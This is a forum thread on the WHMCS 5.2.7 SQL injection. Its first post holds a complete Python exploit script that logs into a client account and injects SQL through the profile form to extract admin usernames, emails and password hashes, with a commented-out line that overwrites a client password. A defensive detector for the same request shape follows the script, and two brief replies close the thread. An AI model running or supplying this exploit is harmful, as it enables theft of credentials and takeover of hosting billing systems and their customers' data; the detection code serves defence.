WHMCS 5.2.7 SQL Injection
#1
The YouTube video explains how the WHMCS 5.2.7 SQL injection vulnerability is used. It displays better if you watch it in full screen. The Python script for the vulnerability is as follows:






Code:
#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    print "Doing stuff: %s" % sql
    r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
    return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
    print "Getting CSRF token"
    r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
    csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
    cookie = r.info()['set-cookie'].split(';')[0]
    print "Logging in"
    r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
    if 'dologin.php' in r:
        sys.exit('Unable to login')
    else:
        return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)
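A defensive check for the request shape the script above produces, added here as an example and not part of the original post or of WHMCS: it flags POSTs to clientarea.php?action=details whose profile fields carry SQL syntax instead of plain text. The function name, rule names and sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Text fields the posted script submits to clientarea.php?action=details.
PROFILE_FIELDS = {"firstname", "lastname", "companyname", "address1",
                  "address2", "city", "state", "postcode", "phonenumber"}

# Rules modelled on the payload shape in the posted script (rule names are
# made up for this example).
RULES = [
    ("sql_function_prefix", re.compile(r"^\s*AES_ENCRYPT\s*\(", re.I)),
    ("subquery", re.compile(r"\(\s*SELECT\b", re.I)),
    ("extra_assignment", re.compile(r",\s*\w+\s*=")),
]

def scan_request(path, body):
    """Return a sorted list of (field, rule) hits for one POST request."""
    if "clientarea.php" not in path or "action=details" not in path:
        return []
    hits = []
    # parse_qsl URL-decodes each value, so encoded payloads are matched too.
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field in PROFILE_FIELDS:
            hits += [(field, name) for name, rx in RULES if rx.search(value)]
    return sorted(hits)

# Constructed sample request bodies (not captured traffic).
BENIGN_BODY = ("token=x&firstname=Ay%C5%9Fe&lastname=Y%C4%B1lmaz"
               "&companyname=Acme%2C+Ltd&address1=1+Main+St&save=Save+Changes")
SUSPECT_BODY = ("token=x&firstname=AES_ENCRYPT%281%2C1%29%2C+firstname%3D"
                "%28SELECT+1%29&lastname=1&save=Save+Changes")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(label, scan_request("/clientarea.php?action=details", body))
```

The same function can be run over POST bodies recovered from a WAF or reverse-proxy log; ordinary access logs do not record request bodies.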
#2
Thanks for your effort.
#3
While watching, I noticed there were 2 pages; there aren't very many sites, is that right?